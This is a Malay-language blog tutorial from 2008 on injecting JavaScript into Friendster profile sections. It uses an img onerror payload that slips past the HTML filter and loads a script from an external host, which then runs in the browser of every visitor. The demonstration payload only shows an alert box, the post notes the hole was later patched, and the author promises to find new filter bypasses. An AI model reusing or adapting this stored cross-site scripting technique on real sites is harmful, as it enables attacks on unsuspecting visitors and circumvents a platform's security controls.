external linker sebenarnya adalah satu link yang dibuat untuk menghubungkan file yang ada dalam domain lain kepada friendster.com. trick ini menggunakan kaedah code injection javascript dengan memanipulasi kelemahan² dalam system friendster.
Antara section yang jadi pilihan untuk inject code adalah dekat "About Me", "Who I Want to Meet" dan "Media" section. kenapa? sebab nya kat tempat tu je yang boleh masukkan html code. code yang dimasukkan dekat bahagian tersebut mestilah boleh terlepas dari HTML filter.
bagi menjelaskan lagi macam mane ianya berfungsi. ikuti tutorial di bawah.
[ simple tutorial : letak alert box dekat profile ]
Step 1
Pertama sekali anda mesti ade hosting untuk hostkan file javascript anda. kalau takde aku recommend kan http://www.ripway.com (free host support php). dah abes register klik create text file
Lepas tu namakan file tersebut kepada linker.txt dan kandungan nya:
window.alert('Selamat Datang ke Profile Saya!');
kemudian tekan 'Create' kat button bawah tu.
Step 2
Code ini perlu dimasukkan dalam "About Me" atau "Who I want to meet" buat masa sekarang 2 tempat ni je yang menjadi sebab kalau kat "Media" banyak sangat problemnya..
<img id='musafircyber' width='0' height='0' src=KE? onerror="a=document.createElement('script');a.src='http://h1.ripway.com/Illusions/linker.txt';navBg.appendChild(a);">
URL yang dibold kan adalah URL daripada 'linker.txt' Step 1 kat atas. tuka kepada URL anda sendiri. mane nak dapat URL tu?
Lepas save profile anda boleh la view profile anda.
Bila anda view profile anda keluar alert box seperti ini
maknanya anda dah berjaya..
anda jugak boleh buat dynamic alert box dimana setiap user yang view friendster anda akan kluar nama mereka sendiri. Ubah code tadi jadi macam ni
window.alert('Selamat Datang '+ pageViewerFName +' ke Profile Saya!');
p/s: code ini hanya efektif buat masa sekarang sehingga tiba Friendster Update. kalau Friendster buat update nanti aku update balik code tu.
UPDATE:
20 Disember 2008
Aku baru dapat tahu linker diatas tidak boleh digunakan lagi. Friendter telah buat update lagi dan linker tersebut telah dipatch. Nanti aku cari cara laen macam mane nak bypass friendster filter.
klik gambar untuk zoom.
ReplyDelete